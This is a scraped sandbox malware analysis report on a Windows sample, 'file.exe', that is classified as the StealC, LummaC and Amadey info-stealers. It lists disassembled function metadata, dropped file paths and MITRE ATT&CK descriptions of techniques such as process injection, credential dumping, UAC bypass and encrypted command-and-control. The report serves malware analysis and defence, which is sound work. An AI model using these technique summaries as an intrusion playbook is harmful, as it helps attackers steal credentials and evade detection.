Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$calloc
String ID:
API String ID: 3339632435-0
Opcode ID: 005b7d311062e9d650b6d584e14bce5770ea81111895727b82966556dcac03c5
Instruction ID: b9c7916fb01f9b381a93057360f567a8a359bd020bb0ef244caf01cef47716e8
Opcode Fuzzy Hash: 005b7d311062e9d650b6d584e14bce5770ea81111895727b82966556dcac03c5
Instruction Fuzzy Hash: 21319070A453868BDB20BF3996882597BB8BF0630CF46567DDC8887A11EB34E495CBC1

Function 6C72A4E0 Relevance: 5.1, APIs: 4, Instructions: 75stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,6C72A468,00000000), ref: 6C72A4F9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,6C72A468,00000000), ref: 6C72A51B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C72A468,?,6C72A468,00000000), ref: 6C72A545
memcpy.VCRUNTIME140(00000001,6C72A468,00000001,?,?,?,6C72A468,00000000), ref: 6C72A57D

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: strlen$memcpy
String ID:
API String ID: 3396830738-0
Opcode ID: 600eb8a033a5ca9a43437b08be08586c367961074f3215d643a34829541b8b4a
Instruction ID: ca85a87ea16917fd24a2347c0a90db8c4f8cc90a338362d6a418caba320f61a5
Opcode Fuzzy Hash: 600eb8a033a5ca9a43437b08be08586c367961074f3215d643a34829541b8b4a
Instruction Fuzzy Hash: F71129F3D0131567DF009ABADD81AAB77D99F95278F280634ED24877C0F6399A0883E1

Function 6C7D0F10 Relevance: 5.1, APIs: 4, Instructions: 52stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C772AF5,?,?,?,?,?,6C770A1B,00000000), ref: 6C7D0F1A
malloc.MOZGLUE(00000001), ref: 6C7D0F30
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C7D0F42
TlsGetValue.KERNEL32 ref: 6C7D0F5B

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Valuemallocmemcpystrlen
String ID:
API String ID: 2332725481-0
Opcode ID: 075f987c3b8b649c5ce005a465267a9db6a8306b4dc2d8041fe112a23c30ced7
Instruction ID: 987d57fc49b6f6251de7a21453bb899bc401ad5c2e770e8f7d30277c6ed8a985
Opcode Fuzzy Hash: 075f987c3b8b649c5ce005a465267a9db6a8306b4dc2d8041fe112a23c30ced7
Instruction Fuzzy Hash: 0701FCB1E012905BEB202B3E9F089567AACEF5325DF161535EC1CC2E21E730E955C6E3

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\BKFBAKFCBFHIJJJJDBFC

C:\ProgramData\DBKKFHIE

C:\ProgramData\EBKKKEGIDBGHIDGDHDBFHDAKJJ

C:\ProgramData\HIDAFHDH

C:\ProgramData\HIJJEGDBFIIDGCAKJEBK

C:\ProgramData\IDHIEBAAKJDHIECAAFHC

C:\ProgramData\JEGHCBAFBFHIIECBKFCGIEBFBK

Windows Analysis Report
file.exe

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre